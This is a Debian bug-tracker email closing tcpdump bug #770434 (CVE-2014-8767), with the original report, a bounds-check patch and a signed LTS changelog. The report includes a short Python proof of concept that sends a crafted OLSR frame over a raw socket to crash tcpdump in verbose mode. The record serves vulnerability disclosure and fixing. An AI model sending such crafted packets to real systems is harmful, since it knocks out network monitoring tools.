Your message dated Mon, 08 Dec 2014 18:33:55 +0000
with message-id <e1xy387-0001jb...@franck.debian.org>
and subject line Bug#770434: fixed in tcpdump 4.1.1-1+deb6u1
has caused the Debian Bug report #770434,
regarding tcpdump: CVE-2014-8767: tcpdump denial of service in verbose mode
using malformed OLSR payload
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
770434: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=770434
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: tcpdump
Version: 4.6.2
tags: Security
Use following script for generate packet:
#!/usr/bin/env python
from socket import socket, AF_PACKET, SOCK_RAW
s = socket(AF_PACKET, SOCK_RAW)
s.bind(("lo", 0))
olsr_frame =
"\x00\x1b\xc6\x51\x35\x97\x00\x24\x8c\x7a\xff\x6f\x08\x00\x45\x15\x00\x3d\xf3\x7f\x40\x00\x4d\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02\x02\xba\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x20\x00\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x20\x01\x00\x00\x00"
s.send(olsr_frame)
#sudo tcpdump -i lo -s 0 -n -v
This cause segfault on tcpdump. This bug was reported as CVE-2014-8767.
Proposed patch is in attached file. Main idea is checking the length of
available
data before print on screen.
The credit belong to
Steffen Bauch
Twitter: @steffenbauch
http://steffenbauch.de
The originally report in BugTraq is:
http://seclists.org/bugtraq/2014/Nov/90
--
CongNT
--- tcpdump-tcpdump-4.6/print-olsr.c 2014-10-23 14:07:12.000000000 +0700
+++ tcpdump-4.6.2/print-olsr.c 2014-11-21 14:56:18.205542679 +0700
@@ -234,6 +234,13 @@
ND_PRINT((ndo, "\n\t neighbor\n\t\t"));
neighbor = 1;
+ u_int caplength;
+
+ /* Checking length of available data before print */
+ caplength = (ndo->ndo_snapend >= msg_data) ? ndo->ndo_snapend - msg_data : 0;
+ if (hello_len > caplength)
+ hello_len = caplength;
+
while (hello_len >= sizeof(struct in_addr)) {
/* print 4 neighbors per line */
--- End Message ---
--- Begin Message ---
Source: tcpdump
Source-Version: 4.1.1-1+deb6u1
We believe that the bug you reported is fixed in the latest version of
tcpdump, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 770...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Thorsten Alteholz <deb...@alteholz.de> (supplier of updated tcpdump package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Format: 1.8
Date: Mon, 08 Dec 2014 18:17:14 +0100
Source: tcpdump
Binary: tcpdump
Architecture: source i386
Version: 4.1.1-1+deb6u1
Distribution: squeeze-lts
Urgency: low
Maintainer: Romain Francoise <rfranco...@debian.org>
Changed-By: Thorsten Alteholz <deb...@alteholz.de>
Description:
tcpdump - A powerful tool for network monitoring and data acquisition
Closes: 770424 770434
Changes:
tcpdump (4.1.1-1+deb6u1) squeeze-lts; urgency=low
.
* Non-maintainer upload by the Squeeze LTS Team.
* Add patches extracted from the upstream tcpdump_4.3 branch fixing
three security issues:
+ CVE-2014-8767: missing bounds checks in the OLSR dissector
(closes: #770434).
+ CVE-2014-8769: missing bounds checks in the AODV dissector
(closes: #770424).
+ CVE-2014-9140: missing bounds checks in the PPP dissector
Checksums-Sha1:
30fbfb11e5f2fc75b5552ef857b18f57386c5911 2006 tcpdump_4.1.1-1+deb6u1.dsc
8f356cbc781192ecb527623d68db90e06aa9d4b9 1587392 tcpdump_4.1.1.orig.tar.gz
0e1f60287770c218c8ba4f9dbde1bd19c3c28a78 17106
tcpdump_4.1.1-1+deb6u1.debian.tar.gz
c563dfbc0b3804751dbd07ea59cc3e002062d024 377242 tcpdump_4.1.1-1+deb6u1_i386.deb
Checksums-Sha256:
e6b815a7c65a4b13981e79caa8136ec1fb7d77aa455d35d6238c5cdc6d32e93e 2006
tcpdump_4.1.1-1+deb6u1.dsc
e6cd4bbd61ec7adbb61ba8352c4b4734f67b8caaa845d88cb826bc0b9f1e7f0a 1587392
tcpdump_4.1.1.orig.tar.gz
3b7b0104f1bbb9b874ece0830764b4b629fc65c3c47b03657733b0046f47928f 17106
tcpdump_4.1.1-1+deb6u1.debian.tar.gz
186f6ce0d68aa25382ec656c8a644195df7ad0b2ac6ac3fca0791ca6ac66946b 377242
tcpdump_4.1.1-1+deb6u1_i386.deb
Files:
60c38fabe1f4252db2aa17859389aded 2006 net optional tcpdump_4.1.1-1+deb6u1.dsc
d0dd58bbd6cd36795e05c6f1f74420b0 1587392 net optional tcpdump_4.1.1.orig.tar.gz
f85bacca750d3133766f9f56c90b874a 17106 net optional
tcpdump_4.1.1-1+deb6u1.debian.tar.gz
330f9dccabd9cb37cf8d2a3c22d19ba7 377242 net optional
tcpdump_4.1.1-1+deb6u1_i386.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQJ8BAEBCgBmBQJUhevrXxSAAAAAAC4AKGlzc3Vlci1mcHJAbm90YXRpb25zLm9w
ZW5wZ3AuZmlmdGhob3JzZW1hbi5uZXQ2MjAxRkJGRkRCQkRFMDc4MjJFQUJCOTY5
NkZDQUMwRDM4N0I1ODQ3AAoJEJb8rA04e1hHJ9MQAIX4/3GanNHhDeuOUJPdQwov
ev9X1byyQg8k+qqBxU3zq6WIfqu6T96Z4uEmrlpMcDGrdsKbGauZN/KoO0THfy20
/b/GzL8InoTIGsqa+RQbEIU+zIJsmtsF+OHzWhnBOMc5tiuIQxSocdOtjpg6HeTU
dXntSeb0IZWw3HgTOtsJo1eDZhydacMfGFOk5RxEsyMEBzhoZArqS8+4wMEzX6w1
1dLDx/9tNBOk8GcirZGyQ7q9qv7dEpgatqajxS8GCHZgD0i0j5Ur9j6NL/fhhHfo
bKC8j5ONNUKZuDElDYSptJn42MLCMwKIvLhJC5PeUNl958Ii6TmIprsphLIyMTbk
YKSOhQHafJFUgFro9M1koy7qhhnyq5nbhUupv+yhI4+Vedt13fciSAaDsuEUWTlE
/EcttReM+DtsoInDHLryB9+aKdBI25Y3LHo7U2X2e81pKPe1InQu+crbxnCAt1c/
6j/uWYNxrb5JnCzF9RtSqEgEO3YMpG2zpXDPKsnAQcFYYCXQB+PIoaCWX1xvK/t9
imDC1bw0lYN9DG01txow/znaHv1LYIe8eb5ShuSPwHoimclEVfLHYV47o55RUw6S
jWrJOAlp4crrAhEly3bof3gBfruO0iJdBEouNrn28x2SUoZQKezLf+gLyd1GRH8z
ym21gmVruJNNhDgnwDg8
=rE9Q
-----END PGP SIGNATURE-----
--- End Message ---
